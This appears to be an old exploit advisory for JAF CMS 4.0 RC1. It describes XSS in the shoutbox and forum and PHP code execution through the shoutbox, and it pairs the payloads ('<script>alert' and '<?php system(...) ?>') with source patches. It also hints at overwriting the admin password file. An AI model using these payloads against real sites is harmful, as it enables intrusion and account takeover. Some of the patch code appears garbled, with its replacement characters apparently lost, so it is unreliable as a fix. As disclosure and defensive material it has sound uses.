########################################################################
##########

## ## _ _ _ _ ##

## Hacker: NanoyMaster ## /|| \ | || \ / ||\ ##

## Exploit: JAF CMS ## / || |\\| || \/ || \ ##

## Version: 4.0 RC1 ## \ || | \ || |\/| || / ##

## ## \||_| \_||_| |_||/ ##

########################################################################
##########

## vulnerabilities: XSS in shoutbox ##

## PHP execution ##

## XSS in forum ##

## ##

########################################################################
##########

## \m/___Props___\m/ ##

## z3r0phr34k ##

## System_Meltdown ##

## THK-GEO & THK-h3x ##

## All of Exploitarians ##

########################################################################
##########

//----------------------------------------------------------------------
--------//

// XSS in shoutbox //

//----------------------------------------------------------------------
--------//

Self explanitory... in the message body put: <script>alert('hi')</script>

Error: module/shout/jafshout.php

Line: 168 - 202

187 - 191 {

$message = preg_replace('/"/','',$_POST['message']);

$message = preg_replace("/>/",">",$_POST['message']);

$message = preg_replace("/</","<",$_POST['message']);

$message = str_replace("onmouse","",$_POST['message']);

$message = str_replace("/\/","edited",$_POST['message']);

}

change the relevent lines to look like the following, bar the first $_POST['message'].

187 - 191 {

$message = preg_replace('/"/','',$message);

$message = preg_replace("/>/",">",$message);

$message = preg_replace("/</","<",$message);

$message = str_replace("onmouse","",$message);

$message = str_replace("/\/","edited",$message);

}

etc etc.

*note*

This should be implemented on all of the variables stored to the flat-file

module/files/shout

*end note*

//----------------------------------------------------------------------
--------//

// PHP execution //

//----------------------------------------------------------------------
--------//

Yet again in the shoutbox type something like:

Windoze) <?php system(dir); ?>

Linux) <?php system(ls -la); ?>

you could see how usefull this could be ;) possably overwright admin/data_inc.php

(where the admin's password hash is) :p

Error: module/shout/jafshout.php

Line: 168 - 202

Patch: (see above code)

//----------------------------------------------------------------------
--------//

// XSS in forum //

//----------------------------------------------------------------------
--------//

Self explanitory... in the message body put: <script>alert('hi')</script>

Error: module/forum/topicwin.php

Line: 112- 123

112 - 117 {

$n_topic["name"]=$name;

$n_topic["email"]=$email;

$n_topic["title"]=$title;

$n_topic["date"]=$date;

$n_topic["ldate"]=$date;

$n_topic["lname"]=$name;

}

change the relevent lines to look like the following.

112 - 117 {

$n_topic["name"]=htmlentities($name, ENT_QUOTES);

$n_topic["email"]=htmlentities($email, ENT_QUOTES);

$n_topic["title"]=htmlentities($title, ENT_QUOTES);

$n_topic["date"]=htmlentities($date, ENT_QUOTES);

$n_topic["ldate"]=htmlentities($date, ENT_QUOTES);

$n_topic["lname"]=htmlentities($name, ENT_QUOTES);

}

etc etc.

//----------------------------------------------------------------------
--------//

// End //

//----------------------------------------------------------------------
--------//

[ reply ]